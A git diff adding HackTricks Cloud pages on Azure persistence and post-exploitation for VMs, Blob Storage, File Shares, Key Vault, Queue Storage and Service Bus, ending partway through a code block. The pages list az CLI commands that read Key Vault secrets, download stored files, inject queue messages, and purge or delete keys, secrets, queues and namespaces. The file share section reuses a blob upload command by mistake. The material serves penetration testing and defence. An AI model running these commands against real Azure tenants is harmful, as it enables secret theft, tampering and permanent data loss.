+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
diff --git a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
new file mode 100644
index 0000000000..5f67c2b12e
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
@@ -0,0 +1,51 @@
+# Az - VMs Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## VMs persistence
+
+For more information about VMs check:
+
+{% content-ref url="../az-services/vms/" %}
+[vms](../az-services/vms/)
+{% endcontent-ref %}
+
+### Backdoor VM applications, VM Extensions & Images <a href="#backdoor-instances" id="backdoor-instances"></a>
+
+An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed.
+
+### Backdoor Instances <a href="#backdoor-instances" id="backdoor-instances"></a>
+
+An attacker could get access to the instances and backdoor them:
+
+* Using a traditional **rootkit** for example
+* Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
+* Backdooring the **User Data**
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/README.md b/pentesting-cloud/azure-security/az-post-exploitation/README.md
new file mode 100644
index 0000000000..cc0b53da54
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-post-exploitation/README.md
@@ -0,0 +1,2 @@
+# Az - Post Exploitation
+
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md
new file mode 100644
index 0000000000..d63a1375f6
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md
@@ -0,0 +1,71 @@
+# Az - Blob Storage Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Storage Privesc
+
+For more information about storage check:
+
+{% content-ref url="../az-services/az-storage.md" %}
+[az-storage.md](../az-services/az-storage.md)
+{% endcontent-ref %}
+
+### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
+
+A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**.
+
+```bash
+# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
+az storage blob list \
+  --account-name <acc-name> \
+  --container-name <container-name> --auth-mode login
+  
+az storage blob download \
+  --account-name <acc-name> \
+  --container-name <container-name> \
+  -n file.txt --auth-mode login
+```
+
+### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
+
+A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob):
+
+```bash
+# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
+az storage blob upload \
+  --account-name <acc-name> \
+  --container-name <container-name> \
+  --file /tmp/up.txt --auth-mode login --overwrite
+```
+
+### \*/delete
+
+This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md
new file mode 100644
index 0000000000..6176807e12
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md
@@ -0,0 +1,74 @@
+# Az - File Share Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## File Share Privesc
+
+For more information about file shares check:
+
+{% content-ref url="../az-services/az-file-shares.md" %}
+[az-file-shares.md](../az-services/az-file-shares.md)
+{% endcontent-ref %}
+
+### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read
+
+A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**.
+
+```bash
+# List files inside an azure file share
+az storage file list \
+    --account-name <name> \
+    --share-name <share-name> \
+    --auth-mode login --enable-file-backup-request-intent
+
+# Download an specific file 
+az storage file download \
+    --account-name <name> \
+    --share-name <share-name> \
+    --path <filename-to-download> \
+    --dest /path/to/down \
+    --auth-mode login --enable-file-backup-request-intent
+```
+
+### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action
+
+A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share):
+
+```bash
+az storage blob upload \
+  --account-name <acc-name> \
+  --container-name <container-name> \
+  --file /tmp/up.txt --auth-mode login --overwrite
+```
+
+### \*/delete
+
+This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
new file mode 100644
index 0000000000..3308537236
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
@@ -0,0 +1,147 @@
+# Az - Key Vault Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Azure Key Vault
+
+For more information about this service check:
+
+{% content-ref url="../az-services/keyvault.md" %}
+[keyvault.md](../az-services/keyvault.md)
+{% endcontent-ref %}
+
+### Microsoft.KeyVault/vaults/secrets/getSecret/action
+
+This permission will allow a principal to read the secret value of secrets:
+
+{% code overflow="wrap" %}
+```bash
+az keyvault secret show --vault-name <vault name> --name <secret name>
+
+# Get old version secret value
+az keyvault secret show --id https://<KeyVaultName>.vault.azure.net/secrets/<KeyVaultName>/<idOldVersion>
+```
+{% endcode %}
+
+### **Microsoft.KeyVault/vaults/certificates/purge/action**
+
+This permission allows a principal to permanently delete a certificate from the vault.
+
+```bash
+az keyvault certificate purge --vault-name <vault name> --name <certificate name>
+```
+
+### **Microsoft.KeyVault/vaults/keys/encrypt/action**
+
+This permission allows a principal to encrypt data using a key stored in the vault.
+
+{% code overflow="wrap" %}
+```bash
+az keyvault key encrypt --vault-name <vault name> --name <key name> --algorithm <algorithm> --value <value>
+
+# Example
+echo "HackTricks" | base64 # SGFja1RyaWNrcwo=
+az keyvault key encrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value SGFja1RyaWNrcwo=
+```
+{% endcode %}
+
+### **Microsoft.KeyVault/vaults/keys/decrypt/action**
+
+This permission allows a principal to decrypt data using a key stored in the vault.
+
+{% code overflow="wrap" %}
+```bash
+az keyvault key decrypt --vault-name <vault name> --name <key name> --algorithm <algorithm> --value <value>
+
+# Example
+az keyvault key decrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value "ISZ+7dNcDJXLPR5MkdjNvGbtYK3a6Rg0ph/+3g1IoUrCwXnF791xSF0O4rcdVyyBnKRu0cbucqQ/+0fk2QyAZP/aWo/gaxUH55pubS8Zjyw/tBhC5BRJiCtFX4tzUtgTjg8lv3S4SXpYUPxev9t/9UwUixUlJoqu0BgQoXQhyhP7PfgAGsxayyqxQ8EMdkx9DIR/t9jSjv+6q8GW9NFQjOh70FCjEOpYKy9pEGdLtPTrirp3fZXgkYfIIV77TXuHHdR9Z9GG/6ge7xc9XT6X9ciE7nIXNMQGGVCcu3JAn9BZolb3uL7PBCEq+k2rH4tY0jwkxinM45tg38Re2D6CEA==" # This is the result from the previous encryption
+```
+{% endcode %}
+
+### **Microsoft.KeyVault/vaults/keys/purge/action**
+
+This permission allows a principal to permanently delete a key from the vault.
+
+```bash
+az keyvault key purge --vault-name <vault name> --name <key name>
+```
+
+### **Microsoft.KeyVault/vaults/secrets/purge/action**
+
+This permission allows a principal to permanently delete a secret from the vault.
+
+```bash
+az keyvault secret purge --vault-name <vault name> --name <secret name>
+```
+
+### **Microsoft.KeyVault/vaults/secrets/setSecret/action**
+
+This permission allows a principal to create or update a secret in the vault.
+
+{% code overflow="wrap" %}
+```bash
+az keyvault secret set --vault-name <vault name> --name <secret name> --value <secret value>
+```
+{% endcode %}
+
+### **Microsoft.KeyVault/vaults/certificates/delete**
+
+This permission allows a principal to delete a certificate from the vault. The certificate is moved to the "soft-delete" state, where it can be recovered unless purged.
+
+{% code overflow="wrap" %}
+```bash
+az keyvault certificate delete --vault-name <vault name> --name <certificate name>
+```
+{% endcode %}
+
+### **Microsoft.KeyVault/vaults/keys/delete**
+
+This permission allows a principal to delete a key from the vault. The key is moved to the "soft-delete" state, where it can be recovered unless purged.
+
+```bash
+az keyvault key delete --vault-name <vault name> --name <key name>
+```
+
+### **Microsoft.KeyVault/vaults/secrets/delete**
+
+This permission allows a principal to delete a secret from the vault. The secret is moved to the "soft-delete" state, where it can be recovered unless purged.
+
+```bash
+az keyvault secret delete --vault-name <vault name> --name <secret name>
+```
+
+### Microsoft.KeyVault/vaults/secrets/restore/action
+
+This permission allows a principal to restore a secret from a backup.
+
+```bash
+az keyvault secret restore --vault-name <vault-name> --file <backup-file-path>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md
new file mode 100644
index 0000000000..15a9a939d3
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md
@@ -0,0 +1,129 @@
+# Az - Queue Storage Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Queue
+
+For more information check:
+
+{% content-ref url="../az-services/az-queue-enum.md" %}
+[az-queue-enum.md](../az-services/az-queue-enum.md)
+{% endcontent-ref %}
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read`
+
+An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks.
+
+{% code overflow="wrap" %}
+```bash
+az storage message peek --queue-name <queue_name> --account-name <storage_account>
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/process/action`
+
+With this permission, an attacker can retrieve and process messages from an Azure Storage Queue. This means they can read the message content and mark it as processed, effectively hiding it from legitimate systems. This could lead to sensitive data being exposed, disruptions in how messages are handled, or even stopping important workflows by making messages unavailable to their intended users.
+
+{% code overflow="wrap" %}
+```bash
+az storage message get --queue-name <queue_name> --account-name <storage_account>
+```
+{% endcode %}
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action`
+
+With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages.
+
+{% code overflow="wrap" %}
+```bash
+az storage message put --queue-name <queue-name> --content "Injected malicious message" --account-name <storage-account>
+```
+{% endcode %}
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write`
+
+This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue.
+
+{% code overflow="wrap" %}
+```bash
+az storage message put --queue-name <queue-name> --content "Injected malicious message" --account-name <storage-account>
+
+#Update the message
+az storage message update --queue-name <queue-name> \
+    --id <message-id> \
+    --pop-receipt <pop-receipt> \
+    --content "Updated message content" \
+    --visibility-timeout <timeout-in-seconds> \
+    --account-name <storage-account>
+```
+{% endcode %}
+
+### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete`
+
+This permission allows an attacker to delete queues within the storage account. By leveraging this capability, an attacker can permanently remove queues and all their associated messages, causing significant disruption to workflows and resulting in critical data loss for applications that rely on the affected queues. This action can also be used to sabotage services by removing essential components of the system.
+
+{% code overflow="wrap" %}
+```bash
+az storage queue delete --name <queue-name> --account-name <storage-account>
+```
+{% endcode %}
+
+### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/delete`
+
+With this permission, an attacker can clear all messages from an Azure Storage Queue. This action removes all messages, disrupting workflows and causing data loss for systems dependent on the queue.
+
+{% code overflow="wrap" %}
+```bash
+az storage message clear --queue-name <queue-name> --account-name <storage-account>
+```
+{% endcode %}
+
+### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
+
+This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
+
+{% code overflow="wrap" %}
+```bash
+az storage queue create --name <new-queue-name> --account-name <storage-account>
+
+az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account>
+
+az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
+```
+{% endcode %}
+
+## References
+
+* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md
new file mode 100644
index 0000000000..f0f7613da6
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md
@@ -0,0 +1,140 @@
+# Az - Service Bus Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Service Bus
+
+For more information check:
+
+{% content-ref url="../az-services/az-servicebus-enum.md" %}
+[az-servicebus-enum.md](../az-services/az-servicebus-enum.md)
+{% endcontent-ref %}
+
+### Actions: `Microsoft.ServiceBus/namespaces/Delete`
+
+An attacker with this permission can delete an entire Azure Service Bus namespace. This action removes the namespace and all associated resources, including queues, topics, subscriptions, and their messages, causing widespread disruption and permanent data loss across all dependent systems and workflows.
+
+{% code overflow="wrap" %}
+```bash
+az servicebus namespace delete --resource-group <ResourceGroupName> --name <NamespaceName>
+```
+{% endcode %}
+
+### Actions: `Microsoft.ServiceBus/namespaces/topics/Delete`
+
+An attacker with this permission can delete an Azure Service Bus topic. This action removes the topic and all its associated subscriptions and messages, potentially causing loss of critical data and disrupting systems and workflows relying on the topic.
+
+{% code overflow="wrap" %}
+```bash
+az servicebus topic delete --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <TopicName>
+```
+{% endcode %}
+
+### Actions: `Microsoft.ServiceBus/namespaces/queues/Delete`
+
+An attacker with this permission can delete an Azure Service Bus queue. This action removes the queue and all the messages within it, potentially causing loss of critical data and disrupting systems and workflows dependent on the queue.
+
+{% code overflow="wrap" %}
+```bash
+az servicebus queue delete --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <QueueName>
+```
+{% endcode %}
+
+### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete`
+
+An attacker with this permission can delete an Azure Service Bus subscription. This action removes the subscription and all its associated messages, potentially disrupting workflows, data processing, and system operations relying on the subscription.
+
+{% code overflow="wrap" %}
+```bash
+az servicebus topic subscription delete --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --topic-name <TopicName> --name <SubscriptionName>
+```
+{% endcode %}
+
+### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read`
+
+An attacker with permissions to create or modify Azure Service Bus namespaces can exploit this to disrupt operations, deploy unauthorized resources, or expose sensitive data. They can alter critical configurations such as enabling public network access, downgrading encryption settings, or changing SKUs to degrade performance or increase costs. Additionally, they could disable local authentication, manipulate replica locations, or adjust TLS versions to weaken security controls, making namespace misconfiguration a significant post-exploitation risk.
+
+{% code overflow="wrap" %}
+```bash
+az servicebus namespace create --resource-group <ResourceGroupName> --name <NamespaceName> --location <Location> 
+az servicebus namespace update --resource-group <ResourceGroupName> --name <NamespaceName> --tags <Key=Value>
+```
+{% endcode %}
+
+
+### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`)
+
+An attacker with permissions to create or modify Azure Service Bus queues (to modiffy the queue you will also need the Action:`Microsoft.ServiceBus/namespaces/queues/read`) can exploit this to intercept data, disrupt workflows, or enable unauthorized access. They can alter critical configurations such as forwarding messages to malicious endpoints, adjusting message TTL to retain or delete data improperly, or enabling dead-lettering to interfere with error handling. Additionally, they could manipulate queue sizes, lock durations, or statuses to disrupt service functionality or evade detection, making this a significant post-exploitation risk.
+
+{% code overflow="wrap" %}
+```bash
+az servicebus queue create --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <QueueName> 
